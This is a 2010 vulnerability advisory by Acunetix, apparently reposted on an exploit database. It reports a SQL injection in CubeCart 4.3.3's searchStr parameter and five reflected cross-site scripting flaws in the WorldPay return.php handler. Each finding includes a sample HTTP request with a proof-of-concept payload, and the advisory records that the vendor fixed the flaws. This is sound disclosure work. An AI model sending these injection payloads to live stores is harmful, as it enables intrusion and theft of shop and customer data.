CubeCart 4.3.3 remote SQL injectiond cross site scripting

2010.09.13
Credit: Bogdan Calin
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

We are continuing with the list of security vulnerabilities found in a number of web applications while testing our latest version of Acunetix WVS v7 . In this blog post, we will look into the details of a number of security problems discovered by Acunetix WVS in CubeCart. "CubeCart is a fully featured ecommerce shopping cart solution used by over a million store owners around the world." The following web vulnerabilities were found in CubeCart version 4.3.3; 1.SQL injection in �/cubecart_4/index.php�, parameter �searchStr�. 2.Cross-site Scripting vulnerability in �/cubecart_4/modules/gateway/WorldPay/return.php�, parameter �amount�. 3.Cross-site Scripting vulnerability in �/cubecart_4/modules/gateway/WorldPay/return.php�, parameter �cartId�. 4.Cross-site Scripting vulnerability in �/cubecart_4/modules/gateway/WorldPay/return.php�, parameter �email�. 5.Cross-site Scripting vulnerability in �/cubecart_4/modules/gateway/WorldPay/return.php�, parameter �transId�. 6.Cross-site Scripting vulnerability in �/cubecart_4/modules/gateway/WorldPay/return.php�, parameter �transStatus�. Technical details about each web vulnerability are below: 1. SQL injection in �/cubecart_4/index.php�, parameter �searchStr�. Additional details: SQL query: SQL: SELECT id FROM cube_CubeCart_search WHERE searchstr=''' Sample HTTP Request: GET /cubecart_4/index.php?_a=viewCat&searchStr='&Submit=Go HTTP/1.1 Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c Acunetix-Aspect: enabled Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294 Host: webapps7:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) 2. Cross-site Scripting vulnerability in �/cubecart_4/modules/gateway/WorldPay/return.php�, parameter �amount�. Attack details URL encoded GET input amount was set to � onmouseover=prompt(949088) bad=� The input is reflected inside a tag element between double quotes. Sample HTTP Request: GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=%22%20onmouseover%3dprompt%28949088%29%20bad%3d%22&cartId=&email=&transId=&transStatus= HTTP/1.1 Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294 Host: webapps7:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) 3. Cross-site Scripting vulnerability in �/cubecart_4/modules/gateway/WorldPay/return.php�, parameter �cartId� Attack details URL encoded GET input cartId was set to � onmouseover=prompt(932890) bad=� The input is reflected inside a tag element between double quotes. Sample HTTP Request: GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=%22%20onmouseover%3dprompt%28934178%29%20bad%3d%22&email=&transId=&transStatus= HTTP/1.1 Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294 Host: webapps7:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) 4. Cross-site Scripting vulnerability in �/cubecart_4/modules/gateway/WorldPay/return.php�, parameter �email�. Attack details URL encoded GET input email was set to � onmouseover=prompt(908306) bad=� The input is reflected inside a tag element between double quotes. Sample HTTP Request: GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=%22%20onmouseover%3dprompt%28908306%29%20bad%3d%22&transId=&transStatus= HTTP/1.1 Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294 Host: webapps7:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) 5. Cross-site Scripting vulnerability in �/cubecart_4/modules/gateway/WorldPay/return.php�, parameter �transId�. Attack details URL encoded GET input transId was set to � onmouseover=prompt(998313) bad=� The input is reflected inside a tag element between double quotes. Sample HTTP Request: GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&transId=%22%20onmouseover%3dprompt%28998313%29%20bad%3d%22&transStatus= HTTP/1.1 Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294 Host: webapps7:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) 6. Cross-site Scripting vulnerability in �/cubecart_4/modules/gateway/WorldPay/return.php�, parameter �transStatus�. Attack details URL encoded GET input transStatus was set to � onmouseover=prompt(923101) bad=� The input is reflected inside a tag element between double quotes. Sample HTTP Request: GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&transId=&transStatus=%22%20onmouseover%3dprompt%28923101%29%20bad%3d%22 HTTP/1.1 Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294 Host: webapps7:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) These vulnerabilities were reported to the CubeCart team on 22/7/2010 via the support system on their website and they were fixed in latest version of CubeCart . If you are using CubeCart, download the latest version from their website. -- Bogdan Calin - bogdan [at] acunetix.com CTO Acunetix Ltd. - http://www.acunetix.com Acunetix Web Security Blog - http://www.acunetix.com/blog Follow us on Twitter - http://www.twitter.com/acunetix


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top